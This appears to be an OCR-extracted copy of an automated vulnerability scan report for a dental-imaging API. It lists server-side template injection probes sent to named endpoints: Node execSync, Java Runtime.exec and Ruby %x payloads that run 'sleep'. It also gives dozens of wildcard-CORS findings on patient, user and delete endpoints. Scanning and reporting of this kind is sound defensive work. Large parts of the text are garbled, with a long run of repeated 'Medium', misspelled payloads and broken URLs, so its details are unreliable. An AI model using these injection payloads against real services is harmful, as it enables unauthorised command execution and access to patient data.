Attack #{global.process.mainModule.require('child process').execSync('sleep 3').toString()}

Evidence Other Info

URL https://api.velmeni.ai/api/sikka/create_patient_webhook

Method POST

Attack #set(\$engine="") #set(\$proc=\$engine.getClass().forName("java.lang.Runtime").

getRuntime().exec("sleep 3")) #set(\$null=\$proc.waitFor()) \${null}

Evidence

Info URL Method POST Attack Evidence Other Info URL Method POST Attack #(**sieep 4').toString() }} Evidence Other Info URL Method POST Attack #(**x(sieep 4')) Evidence Other Info URL Method POST Attack #(*x(sieep 4)) Evidence Other Info URL Ditps://api.velmeni.ai/api/sikka/create_patient_webbook POST Attack #(*x(sieep 4)) Evidence Other Info URL Method POST Attack <************************************		
Method POST Attack {{= global.process.mainModule.require('child_process').execSync('sleep 4').toString() }} Evidence Other Info URL https://api.velmeni.ai/api/sikka/create_patient_webhook Method POST Attack #{{%x(sleep 4)}} Evidence Other Info URL https://api.velmeni.ai/api/sikka/create_patient_webhook POST Attack = *** Method POST Attack *** Method POST Attack *** Evidence Other Info URL https://api.velmeni.ai/api/velmeni_bridge/add_image POST Attack *** Method POST Attack *** Evidence Other Info URL https://api.velmeni.ai/api/velmeni_bridge/add_image POST Attack *** Attack *** Evidence Other Info Instances ** Solution Instead of inserting the user input in the template, use it as rendering argument. Reference CWE id WASC id ** WASC id ** Web browser data loading may be possible, due to a Cross Origin Resource Sharing (CORS) missconfiguration on the web server ** Medium ** Cross-Domain Misconfiguration on the web server ** Medium ** Cross-Domain Misconfiguration on the web server ** Medium ** Medium ** Cross-Domain Misconfiguration on the web server ** Medium ** Medium ** Medium ** Medium ** Medium ** Medium * Medium ** Medium ** Medium ** Medium ** Medium * Medium ** Medium ** Medium ** Medium ** Medium * Medium ** Medium ** Medium ** Medium ** Medium * Medium ** Medium ** Medium ** Medium ** Medium * Medium ** Medium ** Medium ** Medium ** Medium * Medium ** Medium ** Medium ** Medium ** Medium * Medium ** Medium ** Medium ** Medium ** Medium * Medium ** Medium ** Medium ** Medium ** Medium * Medium ** Medium ** Medium ** Medium ** Medium * Medium ** Medium ** Medium ** Medium ** Medium * Medium ** Medium ** Medium ** Medium ** Medium * Medium ** Medium ** Medium ** Medium * Medi	Other Info	
Attack Evidence Other Info URL Method POST Attack #{%x(sleep 4)} Evidence Other Info URL https://api.velmeni.ai/api/sikka/create_patient_webhook POST Attack #{%x(sleep 4)} Evidence Other Info URL https://api.velmeni.ai/api/sikka/create_patient_webhook POST Attack # *** **Evidence Other Info URL https://api.velmeni.ai/api/sikka/create_patient_webhook POST Attack *** **Evidence Other Info URL https://api.velmeni.ai/api/velmeni_bridge/add_image POST Attack *** **Evidence Other Info URL https://api.velmeni.ai/api/velmeni_bridge/add_image POST Attack *** **Evidence Other Info Instances S5 Solution Instead of inserting the user input in the template, use it as rendering argument. https://portswigger.net/blog/server-side-template-injection 74 20 Plugin Id **Description Web browser data loading may be possible, due to a Cross Origin Resource Sharing (CORS) misconfiguration on the web server **Interval and interval and	URL	https://api.velmeni.ai/api/sikka/create_patient_webhook
Evidence Other Info URL https://api.velmeni.ai/api/sikka/create_patient_webhook POST Attack #{%x(sleep 4)} Evidence Other Info URL https://api.velmeni.ai/api/sikka/create_patient_webhook Method POST Attack <%=%x(sleep 3)%> Evidence Other Info URL https://api.velmeni.ai/api/sikka/create_patient_webhook Method POST Attack <%=%x(sleep 3)%> Evidence Other Info URL https://api.velmeni.ai/api/velmeni_bridge/add_image Method POST Attack <%=%x(sleep 3)%> Evidence Other Info Instances S5 Solution Instead of inserting the user input in the template, use it as rendering argument. Reference CVE Id WASC Id 20 Plugin Id 90036 Medium Cross-Domain Misconfiguration Description Web browser data loading may be possible, due to a Cross Origin Resource Sharing (CORS) misconfiguration on the web server	Method	POST
Other Info URL bttps://api.velmeni.ai/api/sikka/create_patient_webhook Method POST Attack #{%x(sleep 4)} Evidence Other Info URL bttps://api.velmeni.ai/api/sikka/create_patient_webhook Method POST Attack <%=%x(sleep 3)%> Evidence Other Info URL bttps://api.velmeni.ai/api/sikka/create_patient_webhook Method POST Attack <%=%x(sleep 3)%> Evidence Other Info URL bttps://api.velmeni.ai/api/velmeni_bridge/add_image Method POST Attack <%=%x(sleep 3)%> Evidence Other Info Instances 85 Solution Instead of inserting the user input in the template, use it as rendering argument. Reference CVE Id WASC Id 74 20 Plugin Id 90036 Medium Cross-Domain Misconfiguration Web browser data loading may be possible, due to a Cross Origin Resource Sharing (CORS) misconfiguration on the web server	Attack	{{= global.process.mainModule.require('child_process').execSync('sleep 4').toString() }}
Info URL https://api.velmeni.ai/api/sikka/create_patient_webhook Method POST Attack #{%x(sleep 4)} Evidence Other Info URL https://api.velmeni.ai/api/sikka/create_patient_webhook Method POST Attack Attack <pre> Attack Attack Attack W=%x(sleep 3)%> Evidence Other Info URL https://api.velmeni.ai/api/velmeni_bridge/add_image POST Attack Attac</pre>	Evidence	
Method POST Attack #{%x(sleep 4)} Evidence Other Info URL https://api.velmeni.ai/api/sikka/create_patient_webhook Method POST Attack <%=%x(sleep 3)%> Evidence Other Info URL https://api.velmeni.ai/api/velmeni_bridge/add_image Other Info URL https://api.velmeni.ai/api/velmeni_bridge/add_image Method POST Attack <%=%x(sleep 3)%> Evidence Other Info Instances Solution Instead of inserting the user input in the template, use it as rendering argument. Reference CWE id WASC id 20 Plugin Id 90036 Medium Cross-Domain Misconfiguration Description Web browser data loading may be possible, due to a Cross Origin Resource Sharing (CORS) misconfiguration on the web server		
Attack #{%x(sleep 4)} Evidence Other Info URL https://api.velmeni.ai/api/sikka/create_patient_webhook Method POST Attack <%=%x(sleep 3)%> Evidence Other Info URL https://api.velmeni.ai/api/velmeni_bridge/add_image Method POST Attack <%=%x(sleep 3)%> Evidence Other Info Instance Sevidence Other Info Instances 85 Solution Instead of inserting the user input in the template, use it as rendering argument. https://portswigger.net/blog/server-side-template-injection CWE id WASC id 20 Plugin Id 90036 Medium Cross-Domain Misconfiguration Description Web browser data loading may be possible, due to a Cross Origin Resource Sharing (CORS) misconfiguration on the web server	URL	https://api.velmeni.ai/api/sikka/create_patient_webhook
Evidence Other Info URL https://api.velmeni.ai/api/sikka/create_patient_webhook Method POST Attack <%=%x(sleep 3)%> Evidence Other Info URL https://api.velmeni.ai/api/velmeni_bridge/add_image Method POST Attack <%=%x(sleep 3)%> Evidence Other Info Instance Seption Instead of inserting the user input in the template, use it as rendering argument. https://portswigger.net/blog/server-side-template-injection 74 20 Plugin Id 90036 Medium Cross-Domain Misconfiguration Web browser data loading may be possible, due to a Cross Origin Resource Sharing (CORS) misconfiguration on the web server	Method	POST
Other Info URL https://api.velmeni.ai/api/sikka/create_patient_webhook Method POST Attack <%=%x(sleep 3)%> Evidence Other Info URL https://api.velmeni.ai/api/velmeni_bridge/add_image Method POST Attack <%=%x(sleep 3)%> Evidence Other Info Instances 95 Solution Instead of inserting the user input in the template, use it as rendering argument. Reference CWE Id WASC Id 20 Plugin Id 90036 Medium Cross-Domain Misconfiguration Description Web browser data loading may be possible, due to a Cross Origin Resource Sharing (CORS) misconfiguration on the web server	Attack	#{%x(sleep 4)}
Info URL https://api.velmeni.ai/api/sikka/create_patient_webhook Method POST Attack Atta	Evidence	
Attack <%=%x(sleep 3)%> Evidence Other Info URL https://api.velmeni.ai/api/velmeni_bridge/add_image Method POST Attack <%=%x(sleep 3)%> Evidence Other Info Other Info Instances 85 Solution Instead of inserting the user input in the template, use it as rendering argument. Reference CWE Id WASC Id 74 20 Plugin Id 90036 Medium Cross-Domain Misconfiguration Description Web browser data loading may be possible, due to a Cross Origin Resource Sharing (CORS) misconfiguration on the web server		
Attack <%=%x(sleep 3)%> Evidence Other Info URL https://api.velmeni.ai/api/velmeni_bridge/add_image Method POST Attack <%=%x(sleep 3)%> Evidence Other Info Instances 85 Solution Instead of inserting the user input in the template, use it as rendering argument. Reference https://portswigger.net/blog/server-side-template-injection CWE Id WASC Id 74 20 Plugin Id 90036 Medium Cross-Domain Misconfiguration Description Web browser data loading may be possible, due to a Cross Origin Resource Sharing (CORS) misconfiguration on the web server	URL	https://api.velmeni.ai/api/sikka/create_patient_webhook
Evidence Other Info URL https://api.velmeni.ai/api/velmeni_bridge/add_image Method POST Attack <%=%x(sleep 3)%> Evidence Other Info Instances 85 Solution Instead of inserting the user input in the template, use it as rendering argument. Reference https://portswigger.net/blog/server-side-template-injection CWE Id WASC Id 74 20 Plugin Id 90036 Medium Cross-Domain Misconfiguration Web browser data loading may be possible, due to a Cross Origin Resource Sharing (CORS) misconfiguration on the web server	Method	POST
Other Info URL https://api.velmeni.ai/api/velmeni_bridge/add_image Method POST Attack <%=%x(sleep 3)%> Evidence Other Info Instances 85 Solution Instead of inserting the user input in the template, use it as rendering argument. Reference https://portswigger.net/blog/server-side-template-injection CWE Id WASC Id 20 Plugin Id 90036 Medium Cross-Domain Misconfiguration Description Web browser data loading may be possible, due to a Cross Origin Resource Sharing (CORS) misconfiguration on the web server	Attack	<%=%x(sleep 3)%>
Info URL https://api.velmeni.ai/api/velmeni_bridge/add_image Method POST Attack <pre></pre>	Evidence	
Method POST Attack <%=%x(sleep 3)%> Evidence Other Info Instances 85 Solution Instead of inserting the user input in the template, use it as rendering argument. Reference CWE Id WASC Id Plugin Id Plugin Id Cross-Domain Misconfiguration Description Web browser data loading may be possible, due to a Cross Origin Resource Sharing (CORS) misconfiguration on the web server		
Attack <%=%x(sleep 3)%> Evidence Other Info Instances 85 Solution Instead of inserting the user input in the template, use it as rendering argument. Reference CWE Id WASC Id 74 20 Plugin Id 90036 Medium Cross-Domain Misconfiguration Description Web browser data loading may be possible, due to a Cross Origin Resource Sharing (CORS) misconfiguration on the web server	URL	https://api.velmeni.ai/api/velmeni_bridge/add_image
Description Evidence Other Info Instances 85 Solution Instead of inserting the user input in the template, use it as rendering argument. https://portswigger.net/blog/server-side-template-injection 74 20 Plugin Id Cross-Domain Misconfiguration Description Web browser data loading may be possible, due to a Cross Origin Resource Sharing (CORS) misconfiguration on the web server	Method	POST
Other Info Instances 85 Solution Instead of inserting the user input in the template, use it as rendering argument. Reference CWE Id WASC Id 74 20 Plugin Id 90036 Medium Cross-Domain Misconfiguration Description Web browser data loading may be possible, due to a Cross Origin Resource Sharing (CORS) misconfiguration on the web server	Attack	<%=%x(sleep 3)%>
Instances 85 Solution Instead of inserting the user input in the template, use it as rendering argument. Reference CWE Id WASC Id 74 UNASC Id 20 Plugin Id 90036 Medium Cross-Domain Misconfiguration Description Web browser data loading may be possible, due to a Cross Origin Resource Sharing (CORS) misconfiguration on the web server	Evidence	
Solution Instead of inserting the user input in the template, use it as rendering argument. Reference CWE Id WASC Id Plugin Id Cross-Domain Misconfiguration Description Web browser data loading may be possible, due to a Cross Origin Resource Sharing (CORS) misconfiguration on the web server		
Reference CWE Id WASC Id Plugin Id Pescription Cross-Domain Misconfiguration Web browser data loading may be possible, due to a Cross Origin Resource Sharing (CORS) misconfiguration on the web server https://api.velmeni.ai/api/organizations/delete/262	Instances	85
CWE Id WASC Id 20 Plugin Id 90036 Medium Cross-Domain Misconfiguration Description Web browser data loading may be possible, due to a Cross Origin Resource Sharing (CORS) misconfiguration on the web server	Solution	Instead of inserting the user input in the template, use it as rendering argument.
Plugin Id 90036 Medium Cross-Domain Misconfiguration Description Web browser data loading may be possible, due to a Cross Origin Resource Sharing (CORS) misconfiguration on the web server https://api.velmeni.ai/api/organizations/delete/263	CWE Id	<u>74</u>
Medium Cross-Domain Misconfiguration Web browser data loading may be possible, due to a Cross Origin Resource Sharing (CORS) misconfiguration on the web server https://api.velmeni.ai/api/organizations/delete/262		
Description Web browser data loading may be possible, due to a Cross Origin Resource Sharing (CORS) misconfiguration on the web server https://api.velmeni.ai/api/organizations/delete/262	Plugin Id	<u> </u>
(CORS) misconfiguration on the web server	Medium	Cross-Domain Misconfiguration
https://api.velmeni.ai/api/organizations/delete/26?	Description	
URL source system=VELMENI FOR DENTIST	URL	https://api.velmeni.ai/api/organizations/delete/26? source_system=VELMENI_FOR_DENTIST_
Method DELETE	Method	DELETE
Attack	Attack	
Evidence Access-Control-Allow-Origin: *	Evidence	Access-Control-Allow-Origin: *
The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser Other implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.		arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

URL https://api.velmeni.ai/api/organizations/practice/delete/1659?

source system=VELMENI FOR DENTIST

Method DELETE

Attack

Other

Info

Evidence Access-Control-Allow-Origin: *

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL https://api.velmeni.ai/api/patient/delete/145139?source_system=VELMENI_FOR_DENTIST

Method DELETE

Attack

Other

Info

Evidence Access-Control-Allow-Origin: *

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL https://api.velmeni.ai/api/user/delete/1919?source_system=VELMENI_FOR_DENTIST

Method DELETE

Attack

Other

Info

Evidence Access-Control-Allow-Origin: *

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL https://api.velmeni.ai/api/analytics/compare_json/22?

source system=VELMENI FOR DENTIST

Method GET

Attack

Other

Info

Evidence Access-Control-Allow-Origin: *

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL https://api.velmeni.ai/api/analytics/doctor_stats?

organization id=7&source system=VELMENI FOR DENTIST

Method GET

Attack

Evidence Access-Control-Allow-Origin: *

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser

implementations do not permit arbitrary third parties to read the response from

Other Info

authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.

https://api.velmeni.ai/api/analytics/generate_visit_report?

visit id=115535&report type=pdf&source system=VELMENI FOR DENTIST

Method GET

Attack

Other

Info

URL

Evidence Access-Control-Allow-Origin: *

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL https://api.velmeni.ai/api/analytics/tooth-analysis/1

Method GET

Attack

Other

Info

Evidence Access-Control-Allow-Origin: *

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL https://api.velmeni.ai/api/auth/list_scopes?source_system=VELMENI_FOR_DENTIST

Method GET

Attack

Other

Info

Evidence Access-Control-Allow-Origin: *

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL https://api.velmeni.ai/api/dental_robot/get_patient/D12345_1_100

Method GET

Attack

Other

Info

Evidence Access-Control-Allow-Origin: *

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL https://api.velmeni.ai/api/hierarchy?source_system=VELMENI_FOR_DENTIST

Method GET

Attack

Evidence Access-Control-Allow-Origin: *

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated

Other implementations do not permit arbitrary third parties to read the response fro Info APIs, however. This reduces the risk somewhat. This misconfiguration could

which uses some other form of security, such as IP address white-listing.

URL https://api.velmeni.ai/api/organizations/53/practice?

source system=VELMENI FOR DENTIST

Method GET

Attack

Other

Info

Evidence Access-Control-Allow-Origin: *

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL https://api.velmeni.ai/api/organizations/get/26?source_system=VELMENI_FOR_DENTIST

Method GET

Attack

Other

Info

Evidence Access-Control-Allow-Origin: *

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL https://api.velmeni.ai/api/organizations/get_organization_logo_urls/1

Method GET

Attack

Other Info

Evidence Access-Control-Allow-Origin: *

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL https://api.velmeni.ai/api/organizations/get_practice_logo_urls/1453?

source system=VELMENI FOR DENTIST

Method GET

Attack

Other

Info

Evidence Access-Control-Allow-Origin: *

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL https://api.velmeni.ai/api/organizations/list?source_system=VELMENI_FOR_DENTIST

Method GET

Attack

Evidence Access-Control-Allow-Origin: *

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated

nfo APIs, however. This reduces the risk somewhat. This misconfiguration could

Other Info

which uses some other form of security, such as IP address white-listing.

https://api.velmeni.ai/api/organizations/practice/get/1273? **URL**

source system=VELMENI FOR DENTIST

Method **GET**

Attack

Other

Info

Evidence Access-Control-Allow-Origin: *

> The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

https://api.velmeni.ai/api/patient/56526/history/?source_system=VELMENI_FOR_DENTIST **URL**

Method **GET**

Attack

Other

Info

Evidence Access-Control-Allow-Origin: *

> The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL https://api.velmeni.ai/api/patient/get/145139?source_system=VELMENI_FOR_DENTIST

Method **GET**

Attack

Other Info

Evidence Access-Control-Allow-Origin: *

> The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

https://api.velmeni.ai/api/patient/list/1656?source_system=VELMENI_FOR_DENTIST **URL**

Method **GET**

Attack

Other

Info

Evidence Access-Control-Allow-Origin: *

> The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

https://api.velmeni.ai/api/patient/list_image_by_patient/137120? **URL**

source system=VELMENI FOR DENTIST

Method **GET**

Attack

Evidence Access-Control-Allow-Origin: *

> The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated

Other APIs, however. This reduces the risk somewhat. This misconfiguration could

which uses some other form of security, such as IP address white-listing.

https://api.velmeni.ai/api/patient/list_image_by_visit_id/107073? **URL**

source system=VELMENI FOR DENTIST

Method **GET**

Attack

Other

Info

Evidence Access-Control-Allow-Origin: *

> The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL https://api.velmeni.ai/api/patient/list_images/3

Method **GET**

Attack

Other

Info

URL

Evidence Access-Control-Allow-Origin: *

> The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

https://api.velmeni.ai/api/patient/list_patients/1170? source system=VELMENI FOR DENTIST

Method **GET**

Attack

Other

Info

Evidence Access-Control-Allow-Origin: *

> The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL https://api.velmeni.ai/api/patient/pathology/list?source_system=VELMENI_FOR_DENTIST

Method **GET**

Attack

Other

Info

Evidence Access-Control-Allow-Origin: *

> The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL https://api.velmeni.ai/api/patient/scan/12931?source system=VELMENI FOR DENTIST

GET Method

Attack

Evidence Access-Control-Allow-Origin: *

> The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated

Other APIs, however. This reduces the risk somewhat. This misconfiguration could

which uses some other form of security, such as IP address white-listing.

https://api.velmeni.ai/api/patient/search/399? **URL**

name=pu&source system=VELMENI FOR DENTIST

Method **GET**

Attack

Other

Info

Evidence Access-Control-Allow-Origin: *

> The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

https://api.velmeni.ai/api/user/get/1919?source_system=VELMENI_FOR_DENTIST **URL**

Method **GET**

Attack

Other

Info

Evidence Access-Control-Allow-Origin: *

> The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

https://api.velmeni.ai/api/user/get_preferred_numbering_system? **URL**

source system=VELMENI FOR DENTIST

Method **GET**

Attack

Other

Info

Evidence Access-Control-Allow-Origin: *

> The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL https://api.velmeni.ai/api/user/list/1170?source_system=VELMENI_FOR_DENTIST

Method **GET**

Attack

Other

Info

Evidence Access-Control-Allow-Origin: *

> The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL https://api.velmeni.ai/api/user/list?source_system=VELMENI_FOR_DENTIST

GET Method

Attack

Evidence Access-Control-Allow-Origin: *

> The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated

Other APIs, however. This reduces the risk somewhat. This misconfiguration could

which uses some other form of security, such as IP address white-listing.

URL https://api.velmeni.ai/api/user/list_roles?source_system=VELMENI_FOR_DENTIST

Method GET

Attack

Other

Info

Evidence Access-Control-Allow-Origin: *

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL https://api.velmeni.ai/api/admin/delete organization/27

Method POST

Attack

Other

Info

Evidence Access-Control-Allow-Origin: *

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL https://api.velmeni.ai/api/admin/delete_practice/21

Method POST

Attack

Other

Info

Evidence Access-Control-Allow-Origin: *

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL https://api.velmeni.ai/api/analytics/add_medical_note

Method POST

Attack

Other

Info

Evidence Access-Control-Allow-Origin: *

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL https://api.velmeni.ai/api/analytics/get_comparison_report

Method POST

Attack

Other

Info

Evidence Access-Control-Allow-Origin: *

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL https://api.velmeni.ai/api/analytics/list-analysis-job/3

Method POST

Attack

Other

Info

Evidence Access-Control-Allow-Origin: *

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL https://api.velmeni.ai/api/analytics/logged in users

Method POST

Attack

Other

Info

Evidence Access-Control-Allow-Origin: *

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL https://api.velmeni.ai/api/auth

Method POST

Attack

Other

Info

Evidence Access-Control-Allow-Origin: *

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL https://api.velmeni.ai/api/dental-robot/add-image

Method POST

Attack

Other

Info

Evidence Access-Control-Allow-Origin: *

